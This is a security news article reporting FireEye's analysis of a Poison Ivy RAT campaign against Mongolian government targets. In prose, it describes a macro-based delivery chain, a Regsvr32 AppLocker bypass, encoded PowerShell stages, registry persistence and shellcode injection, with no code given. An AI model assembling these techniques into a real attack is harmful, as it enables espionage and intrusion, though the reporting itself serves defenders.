Security Experts:

Connect with us

Hi, what are you looking for?


Malware & Threats

Poison Ivy RAT Campaign Leverages New Delivery Techniques

A recently observed campaign using the Poison Ivy remote access tool (RAT) against individuals within the Mongolian government uses publicly available techniques that haven’t been observed in previous campaigns, FireEye reports.

A recently observed campaign using the Poison Ivy remote access tool (RAT) against individuals within the Mongolian government uses publicly available techniques that haven’t been observed in previous campaigns, FireEye reports.

The Poison Ivy backdoor has been around for several years, targeting organizations all around the world, and was associated with a China-linked threat actor known as menuPass, Stone Panda and APT10. The malware packs capabilities such as key logging, screen and video capture, file transfers, password theft, system administration, traffic relaying, and more.

FireEye didn’t attribute the new campaign to a specific actor, and told SecurityWeek in an email that it can’t make direct connections to a particular group at this time. The security firm said it lacks visibility into what the actors did and admitted it doesn’t know if they were successful. Still, the company did say that “espionage is a reasonable assumption for their motives.”

What the newly observed campaign did show, however, was that the actor behind it is up-to-date with recent social engineering and evasion techniques and isn’t shy when it comes to using them. The attacks leveraged an AppLocker bypass that was publicly revealed last year, as well as fileless execution and persistence, and benign documents to minimize user suspicion of malicious activity.

The malware was distributed via Word documents with malicious macros, and the threat actor was using social engineering to trick users into enabling these macros. The malicious documents were delivered via email, claiming to contain instructions for logging into webmail or information regarding a state law proposal, FireEye explains.

The malicious macros in the documents were designed to invoke Regsvr32, a command-line utility designed for registering DLLs in the registry, to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument. This technique was demonstrated last year to effectively bypass AppLocker, the Microsoft application whitelisting solution that prevents unknown executables from running on a system.

In this campaign, the malicious SCT file was designed to invoke WScript to launch PowerShell in hidden mode with an encoded command, FireEye reports. After the PowerShell command is decoded, another layer of PowerShell instructions emerges, serving two purposes: to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet; and to download and run another PowerShell script named f0921.ps1.

The third stage PowerShell script configures an encoded command persistently as base64 string in the HKCU: ConsoleFontSecurity registry key, along with an HKCUCurrentVersionRunSecurityUpdate value to launch the encoded PowerShell payload stored in the previously configured key. Thus, the PowerShell payload is executed every time the user logs in to the system.

A fourth stage PowerShell script in the HKCUConsoleFontSecurity registry borrows from the publicly available Inject-LocalShellCode script from PowerSploit to inject shellcode, researchers explain. The shellcode has a custom XOR-based decryption loop that uses a single byte key (0xD4), and was designed to inject the Poison Ivy backdoor into userinit.exe. The decrypted shellcode also revealed content and configuration related to Poison Ivy.

“Although Poison Ivy has been a proven threat for some time, the delivery mechanism for this backdoor uses recent publicly available techniques that differ from previously observed campaigns. Through the use of PowerShell and publicly available security control bypasses and scripts, most steps in the attack are performed exclusively in memory and leave few forensic artifacts on a compromised host,” FireEye says.

Related: August Stealer Uses PowerShell for Fileless Infection

Related: Windows AppLocker Bypassed to Execute Remote Scripts

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this webinar to learn best practices that organizations can use to improve both their resilience to new threats and their response times to incidents.


Join this live webinar as we explore the potential security threats that can arise when third parties are granted access to a sensitive data or systems.


Expert Insights

Related Content


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Malware & Threats

Threat actors are increasingly abusing Microsoft OneNote documents to deliver malware in both targeted and spray-and-pray campaigns.

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.


More than 3,800 servers around the world have been compromised in recent ESXiArgs ransomware attacks, which also include an improved process.

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.

Malware & Threats

A vulnerability affecting IBM’s Aspera Faspex file transfer solution, tracked as CVE-2022-47986, has been exploited in attacks.